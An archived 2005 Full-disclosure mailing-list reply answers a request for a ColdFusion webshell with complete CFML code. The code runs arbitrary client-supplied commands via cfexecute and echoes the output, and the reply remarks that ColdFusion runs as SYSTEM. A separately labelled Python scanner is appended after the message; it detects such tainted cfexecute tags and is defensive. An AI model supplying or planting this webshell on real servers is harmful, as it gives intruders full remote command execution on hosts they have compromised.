Re: [Full-disclosure] coldfusion pentest

From: Kurt Grutzmacher (grutz_at_jingojango.net)
Date: 05/10/05

  • Next message: Valdis.Kletnieks_at_vt.edu: "Re: [Full-disclosure] Fwd: GWAVA Sender Notification (Content filter)"
    Date: Mon, 09 May 2005 20:13:34 -0700
    To: fatb <fatb@security.zz.ha.cn>
    
    

    fatb wrote:

    >anybody could be kind enough to send me a working coldfusion webshell
    >
    >
    ColdFusion runs as SYSTEM by default. Happy trails. (de-htmlized for
    hafe sex)

    &lt;html&gt;
    &lt;body&gt;

    &lt;cfoutput&gt;
    &lt;table&gt;
    &lt;form method="POST" action="cfexec.cfm"&gt;
    &lt;tr&gt;&lt;td&gt;Command:&lt;/td&gt;&lt;td&gt;&lt;input type=text
    name="cmd" size=50
    &lt;cfif
    isdefined("form.cmd")&gt;value="#form.cmd#"&lt;/cfif&gt;&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
    &lt;tr&gt;&lt;td&gt;Options:&lt;/td&gt;&lt;td&gt; &lt;input type=text
    name="opts" size=50
    &lt;cfif
    isdefined("form.opts")&gt;value="#form.opts#"&lt;/cfif&gt;&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
    &lt;tr&gt;&lt;td&gt;Timeout:&lt;/td&gt;&lt;td&gt; &lt;input type=text
    name="timeout" size=4
    &lt;cfif isdefined("form.timeout")&gt;value="#form.timeout#"
    &lt;cfelse&gt;value="5"&lt;/cfif&gt;&gt;&lt;/td&gt;&lt;/tr&gt;
    &lt;/table&gt;
    &lt;input type=submit value="Exec" &gt;
    &lt;/FORM&gt;

    &lt;cfsavecontent variable="myVar"&gt;
    &lt;cfexecute name = "#Form.cmd#"
    arguments = "#Form.opts#"
    timeout = "#Form.timeout#"&gt;
    &lt;/cfexecute&gt;
    &lt;/cfsavecontent&gt;
    &lt;pre&gt;
    #myVar#
    &lt;/pre&gt;
    &lt;/cfoutput&gt;
    &lt;/body&gt;
    &lt;/html&gt;

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/
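
A defensive check for the pattern in the post above, added here as an example (it is not part of the original message): it flags CFML templates in which a `<cfexecute>` attribute is filled from a request scope, including copies stored entity-encoded as in this post. The function names, the scope list and the sample strings are assumptions made for this example.

```python
import html
import re
from pathlib import Path

# Request-controlled CFML scopes: a variable from one of these inside a
# <cfexecute> attribute lets the client choose what the server runs.
TAINTED = re.compile(r"#\s*(?:form|url|cgi|cookie)\s*[.\[]", re.IGNORECASE)
CFEXECUTE_TAG = re.compile(r"<cfexecute\b[^>]*>", re.IGNORECASE)
ATTRIBUTE = re.compile(r"""(\w+)\s*=\s*(["'])(.*?)\2""", re.DOTALL)


def find_tainted_cfexecute(source):
    """Return (line, attribute, value) for each <cfexecute> attribute whose
    value interpolates a request-scope variable."""
    # Decode entities first so copies stored as &lt;cfexecute ...&gt; are seen.
    text = html.unescape(source)
    findings = []
    for tag in CFEXECUTE_TAG.finditer(text):
        line = text.count("\n", 0, tag.start()) + 1
        for attr in ATTRIBUTE.finditer(tag.group(0)):
            if TAINTED.search(attr.group(3)):
                findings.append((line, attr.group(1).lower(), attr.group(3)))
    return findings


def scan_webroot(root):
    """Map each .cfm/.cfc file under root to its findings (clean files omitted)."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in {".cfm", ".cfc"}:
            hits = find_tainted_cfexecute(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report


# Constructed samples: the tag as it appears in the post, and a fixed command.
SAMPLE_FLAGGED = """<cfoutput>
<cfexecute name = "#Form.cmd#"
arguments = "#Form.opts#"
timeout = "#Form.timeout#">
</cfexecute>
</cfoutput>"""
SAMPLE_CLEAN = r'<cfexecute name="C:\WINDOWS\system32\netstat.exe" arguments="-an" timeout="5"></cfexecute>'

if __name__ == "__main__":
    for line, attr, value in find_tainted_cfexecute(SAMPLE_FLAGGED):
        print(f"line {line}: cfexecute {attr}={value!r} comes from the request")
```

A hit on `name` or `arguments` is the one to triage first; a template that runs a fixed command with fixed arguments is not reported.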

